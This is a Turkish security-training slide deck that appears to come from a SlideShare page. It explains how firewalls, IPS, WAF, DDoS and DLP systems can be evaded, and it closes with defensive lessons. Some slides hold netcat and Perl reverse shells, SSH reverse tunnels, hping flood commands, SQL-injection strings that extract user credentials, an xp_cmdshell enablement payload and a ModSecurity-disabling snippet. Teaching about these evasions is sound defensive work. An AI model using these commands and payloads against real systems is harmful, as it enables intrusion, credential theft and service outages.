Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve YönetimiAçık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve YönetimiBilgiO A.S / Linux Akademi
 
Snort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiSnort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiBGA Cyber Security
 
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...OWASP Turkiye
 
Adli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAdli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAhmet Gürel
 
Siber Güvenlik 1. hafta
Siber Güvenlik 1. haftaSiber Güvenlik 1. hafta
Siber Güvenlik 1. haftaOnur Er
 
Sandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerSandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerBGA Cyber Security
 

Similar to Güvenlik Sistemlerini Atlatma ve Alınacak Dersler (20)

Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleri
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
 
Defansif Dünyaya Ofansif Dokunuş - SpookFlare
Defansif Dünyaya Ofansif Dokunuş - SpookFlareDefansif Dünyaya Ofansif Dokunuş - SpookFlare
Defansif Dünyaya Ofansif Dokunuş - SpookFlare
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
 
BGA SOME/SOC Etkinliği - APT Tehditlerine Karşı 7/24 Güvenlik İzlemesi (SOC)
BGA SOME/SOC Etkinliği - APT Tehditlerine Karşı 7/24 Güvenlik İzlemesi (SOC)BGA SOME/SOC Etkinliği - APT Tehditlerine Karşı 7/24 Güvenlik İzlemesi (SOC)
BGA SOME/SOC Etkinliği - APT Tehditlerine Karşı 7/24 Güvenlik İzlemesi (SOC)
 
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliğiBilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
 
Siber Güvenlikte Ofansif Yaklaşımlar
Siber Güvenlikte Ofansif YaklaşımlarSiber Güvenlikte Ofansif Yaklaşımlar
Siber Güvenlikte Ofansif Yaklaşımlar
 
Güvenlik Mühendisliği
Güvenlik MühendisliğiGüvenlik Mühendisliği
Güvenlik Mühendisliği
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
 
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
 
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve YönetimiAçık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
 
.Net ile yazılım güvenliği
.Net ile yazılım güvenliği.Net ile yazılım güvenliği
.Net ile yazılım güvenliği
 
DDoS Engelleme Ürünleri
DDoS Engelleme ÜrünleriDDoS Engelleme Ürünleri
DDoS Engelleme Ürünleri
 
Snort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) EğitimiSnort IPS(Intrusion Prevention System) Eğitimi
Snort IPS(Intrusion Prevention System) Eğitimi
 
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
[OWASP-TR Uygulama Güvenliği Günü 2016] Özkan Boztaş - SSL Protokolüne Karşı ...
 
Adli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAdli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim Araçları
 
Siber Güvenlik 1. hafta
Siber Güvenlik 1. haftaSiber Güvenlik 1. hafta
Siber Güvenlik 1. hafta
 
Zed attack-proxy-web
Zed attack-proxy-webZed attack-proxy-web
Zed attack-proxy-web
 
Sandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerSandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve Öneriler
 
Nmap & Hping
Nmap & HpingNmap & Hping
Nmap & Hping
 

More from BGA Cyber Security

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiBGA Cyber Security
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfBGA Cyber Security
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiBGA Cyber Security
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?BGA Cyber Security
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketlerBGA Cyber Security
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıBGA Cyber Security
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020BGA Cyber Security
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriBGA Cyber Security
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakBGA Cyber Security
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIBGA Cyber Security
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiBGA Cyber Security
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİBGA Cyber Security
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Cyber Security
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerBGA Cyber Security
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsBGA Cyber Security
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiBGA Cyber Security
 

More from BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain Tespiti
 

Güvenlik Sistemlerini Atlatma ve Alınacak Dersler

  • 1. Güvenlik Sistemlerini Atlatma ve Alınacak Dersler Huzeyfe ÖNAL honal@bga.com.tr www.bga.com.tr www.guvenlikegitimleri.com
  • 2. Huzeyfe ÖNAL • Ağ güvenliği uzmanı – Network pentest – Alternatif ağ güvenliği sistemleri – DDoS Engelleme Sistemleri/IPS • Bilgi güvenliği eğitmeni – Bilgi Güvenliği AKADEMİSİ • Güvenlik dünyasının gazetecisi – www.lifeoverip.net
  • 3. Amaç • Bilgi güvenliğinin dinamik bir alan olduğu ve takçalıştır hazır sunulan çözümlerin gerçek manada güvenliğimizi arttırmadığının uygulamalı olarak gösterilmesi. • Bu sunumda anlatılan tüm olaylar kişisel sektör tecrübelerimden oluşmaktadır.
  • 4. Ajanda • Güvenlik sistemleri çeşitleri – Firewall – IPS – WAF – DOS/DDoS engelleme sistemleri – N-DLP – ... • Klasik güvenlik anlayışımız ve eksiklikleri • Güvenlik sistemlerinin çalışma yapıları ve nasıl atlatılabileceği
  • 5. Klasik Güvenlik Anlayışı • Tümden savunma! • Ürün temelli bir güvenlik anlayışı – Ürün= sihirbaz bakış açısı(bilgi-sayar) • Türkiye’ye özel değil tüm dünya için geçerli • Teknik sorunlar teknik yollarla çözülür, insani sorunlar insanla çözülür • Temel bilgi sahibi olmadan ileri seviye işler yapmaya çalışma – TCP/IP bilmeden Firewall/IPS yönetmek
  • 6. Güvenlik Sistemleri • Günümüz sınır güvenliği sistemleri – Güvenlik Duvarı(Firewall) – Saldırı Tespit ve Engelleme Sistemi(IDS/IPS) – Web Uygulama Güvenlik Duvarı(WAF) – DDoS Engelleme Sistemi – Veri Sızma Engelleme(DLP) – ...
  • 7. Güvenlik Duvarları • Ağlar arası erişim kontrolü • IP adresine göre port numarasına göre engelleme yapabilir • 192.168.1.2 ANY TCP Port 80 • 192.168.9.0/24 ANY UDP 53 • Bazı Firewalllar L7(içeriği göre de engelleme yapabilir)
  • 8. Güvenlik Duvarları Nasıl Engelleme Yapar? • Güvenlik Duvarları genelde iki tip engelleme yöntemi kullanır – DROP – REJECT • DROP: Gelen/giden paketi engelle ve geriye herhangi bir mesaj dönme • REJECT:Gelen/giden paketi engelle ve geriye TCP RST/UDP Port Ulaşılamaz gibi bir mesaj dön
  • 9. Güvenlik Duvarı Keşif Çalışmaları • TCP RFC’e göre bir porta SYN bayraklı paket gönderildiğinde – ACK-SYN döner – RST döner – Cevap dönmezse? • Herhangi üç porta gönderilecek TCP paketleriyle Firewall var/yok anlaşılabilir • Çeşitli TCP portlara yönelik tcptraceroute çalışmaları • #nmap firewall_ip adresi
  • 10. Firewall İle Korunan Sistem Yanlış Yapılandırma(?)
  • 12. Güvenlik Duvarları Nasıl Aşılır? • Güvenlik duvarları paketlerin içeriğine bakmaz(L7 firewallar hariç) • Tünelleme yöntemleriyle güvenlik duvarları rahatlıkla aşılabilir • Bir port, bir protokol açıksa tüm portlar ve protokoller açıktır ilkesi! • Internetten indirilecek kurulum gerektirmeyen basit araçlar kullanılarak tüm Firewall’lar aşılabilir(?) • Çalışanların %25’i Güvenlik duvarlarını aşarak işlem yapmaktadır
  • 13. Firewall Atlatma:SSH Tünelleme • Genelikle güvenlik duvarlarında kullanıcılara 80/443. portlara erişime hak verilmiştir • Internette 443. porttan SSH çalıştıran çeşitli ücretsiz SSH servisi veren sistemler bulunmaktadır • SSH Socks proxy desteğine sahiptir • #ssh –D hedef.sistem.com –p 443 –l huzeyfe
  • 14.
  • 15. Firewall Atlatma:Ultrasurf • Ultrasurf: Antisansür programı • Engellemesi en zor yazılımlardan • Kurulum gerektirmez, IP adresi engelleyerek engellenemez…
  • 17. Firewall Atlatma :OpenVPN • OpenVPN: UDP ve TCP üzerinden istenilen portda çalıştırılabilen SSL VPN uygulaması • Evdeki bilgisayara OpenVPN kurup dışarı 53 UDP ve TCP/443(HTTPS) bağlantıları açılır • Tüm trafik UDP/53 üzerinden akacaktır!
  • 20. Firewall Atlatma:Ters Tünelleme • Teamviewer mantığı!
  • 21. Ters Tünelleme Örnekleri • ssh -NR 5000:localhost:22 huzeyfe@evbilgisayari.com –p 443 • Huzeyfe’nin ev bilgisayarının 5000. portu yereldeki SSH portuna tünellenmiş durumda • Netcat Reverse Tunnel – netcat -e /bin/bash www.evbilgisayarim.com 443 – Evbilgisayarim~#nc –l –p 443
  • 22. Perl ile Ters Tünelleme • #!/usr/bin/perl use Socket; $addr=sockaddr_in('3333',inet_aton('localhost')); socket(S,PF_INET,SOCK_STREAM,getprotobyname ('tcp')); connect(S,$addr);select S;$|=1; while(defined($l=<S>)){print qx($l);} close(S);
  • 23. L7 Firewall • Uygulama katmanında işlem yapar – Paketlerin sadece ip ve port bileşenlerine değil içeriğine de bakar – İçerisinde /etc/passwd geçiyorsa engelle gibi! #iptables –A INPUT –p tcp –dport 80 –m string –algo bm –string /etc/passwd –j REJECT gibi
  • 24. L7 Firewall Atlatma • SSL kullanılarak L7 firewallar atlatılabilir • Çeşitli encoding teknikleri kullanılarak L7 firewallar atlatılabilir • Çeşitli ip parçalama teknikleri kullanılarak L7 firewallar atlatılabilir
  • 25.
  • 26. Saldırı Engelleme Sistemleri(IPS) • İkinci nesil güvenlik sistemleri – Firewall & IDS -> IPS & WAF • Pakete ait tüm alanları(L2-L7 arası) iceleyip karar verebilir • DROP TCP ANY 80 URICONTENT cmd.exe • Drop tcp any any -> 192.168.1.0/24 80 (content: "cgibin/phf"; offset: 3; depth: 22; msg: "CGI-PHF attack";) • Temelde iki farklı amaç için tercih edilir – İçerden dışarı yapılabilecek saldırılarda/istenmeyen trafiklerde – Dışardan gelebilecek saldırılarda
  • 27. IPS Keşif Çalışması • Bilinen tüm IPS’lerde default olarak gelen imzalar denenerek aktif bir IPS var mı yok mu anlaşılabilir • %99 açık olan ve IPS’i tetikleyecek imzalar – Cmd.exe – ../../ – /etc/passwd • HTTP isteklerinde bu değerler gönderilerek dönen cevap incelenir – Klasik 404 vs gibi HTTP cevabı dönüyorsa IPS yok(ya da imzalar aktif değil) – Connection RST veya Timeout alınıyorsa IPS Vardır. • IPS yokken ne cevap döner, varken ne cevap döner
  • 28. Örnek • telnet www.checkpoint.com 80 • telnet www.tippingpoint.com 80 • telnet www.cia.gov 80
  • 29. IPS Atlatma Teknikleri-I • IP parçalama • Encoding • Protokole özel atlatma yöntemleri • Google –> IPS evasion …
  • 30. IPS Atlatma Teknikleri-II • SSL üzerinden paket gönderimi
  • 31. Türkiye’de Efektif IPS Kullanım Oranı • Nasıl gerçekleştirildi? • Nc(netcat), Nssl araçları kullanıldı • Önce HTTP üzerinden sonra HTTPS üzerinden aşağıdaki istekler gönderildi • GET ../../etc/passwd HTTP/1.0 • GET ../../cmd.exe HTTP/1.0 •
  • 32. İç Kullanıcıların IPS Atlatması • Tünelleme yöntemleri – ICMP Tunelleme – DNS Protokol Tunelleme – HTTP In Smtp tunelleme – HTTP/HTTPS Tunelleme • WebTunnel
  • 33. WebTunnel ile Firewall/IPS Atlatma #perl wtc.pl tcp://localhost:8080 tcp://vpn.lifeoverip.net:22 http://www.siberguvenlik.org/cgi-bin/wts.pl huzeyfe@seclab:~$ ssh localhost -p 8080 Sunucu Logları
  • 34. DDoS Engelleme Sistemleri • DOS/DDoS Saldırılarını Engelleme Amaçlı Geliştirilmiştir • Genellikle istatistiksel veri analizine dayanır • Karantina/Rate limiting/Threshold özelliği elzemdir! • Dikkatli ayarlanmamış bir DDoS engelleme sistemi tersine bir amaç için kullanılır – 2Mb ile 2Gb lik internet hattının durdurulması!
  • 35. DDoS Sistemi Keşif ÇAlışması • • • • • %100 garantili keşif yöntemi değildir Amaç rate limiting özelliğinin varlığını anlama Hping –S –p 80 –flood 1.2.3.4 Hping –udp –p 53 –flood 1.2.3.4 İlgili portlara erişim sağlanamıyorsa muhtemelen bir ddos engelleme sistemi sizi karantinaya almıştır.
  • 36. Örnek Iptables Kuralları • iptables -A INPUT –p tcp –dport 80 -m limit --limit 50/s --limit-burst 30 –j REJECT • 10 dakikada max 10 bağlantı #iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP -sport 513:65535 --dport 22 -m state --state NEW,ESTABLISHED -m recent --set -j ACCEPT #iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 600 --hitcount 11 -j DROP
  • 37. Hping ile Özel Paket Üretimi • Mikrosaniye =saniyenin 100.000’de biri • Saniyede 10 paket göndermek için – #hping -i u10000 -S -p 22 www.hedefsite.com –a istenilen_ip_adresi • Saniyede 100 adet paket gönderimi – #hping -S -p 22 192.168.2.23 -c 1000 -i u100
  • 38. Web Uygulama Güvenlik Duvarı • Web uygulamalarına spesifik güvenlik duvarı • Sadece port/ip değil tüm paket içeriğine(HTTP, HTTPS vs) bakarak işlem yapılır • WAF arkasında çalıştırılan uygulama sisteme ne kadar iyi tanıtılırsa o oranda başarı sağlanır • Ağ tabanlı IPS’lerden daha fazla koruma sağlar! • Değişik yerleşim/çalışma modelleri vardır – Inline – Reverse Proxy – Passive(Active Response)
  • 39. WAF Keşif Çalışması • Wafw00f • Xss denemeleri vs
  • 40. WAF Atlatma • Genellikle WAF’lar SSL çözümleme yaptığı için SSL üzerinden atlatma işe yaramaz • WAF’ların çıkışından itibaren çeşitli atlatma teknikleri geliştirilmiştir • /*!12345 select * from */ • Reverse_exec • http splitting
  • 41. WAF Atlatma:SQL Yorumları • /* comment */ yorum satırı olarak algılanır(SQL +WAF+IPS tarafından) • /*!sql-code*/ ve /*!12345sql-code*/ yorum olarak algılanmaz(SQL tarafından)(WAF+IPS’ler tarafından yorum olarak algılanır) • /?id=1/*!limit+0+union+select+concat_ws(0x3a,u sername,password,email)+from+users*/
  • 42. WAF Atlatma:Encoding Inline çalışan WAF/IPS’lerde işe yarar
  • 43. WAF Atlatma:Reverse Fonksiyonu • SQL Sunucularda bulunan reverse fonksiyonu kullanılır – Reverse(lqs) = sql • var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('“08.911.39.19 gnip" llehsdmc_px') EXEC (@c);-• REVERSE('“08.911.39.19 gnip" llehsdmc_px')= ping 91.93.119.80
  • 44. WAF Atlatma:ModSecurity(Yerel) • www kullanıcısının yazma izni varsa hackerin ilk yapacağı işlerden biri Modsecurity WAF’ı devre dışı bırakmak olacaktır. <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
  • 45. Ağ Tabanlı DLP Sistemleri • IDS/IPS mantığında çalışır • Şifreli trafiği inceleyemez • Ultrasurf, Gmail vs gibi SSL üzerinden hizmet veren servislerle atlatmak kolaydır
  • 46. Korunma • • • • Eğitim şart! Ürünler sihirbaz değildir! Güvenlik bir süreçtir! Güvenlik bir lüks değil gereksinimdir!
  • 47. Teşekkürler… Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ honal@bga.com.tr http://www.bga.com.tr NetSec Ağ ve Bilgi Güvenliği Topluluğu http://www.lifeoverip.net/netsec-listesi/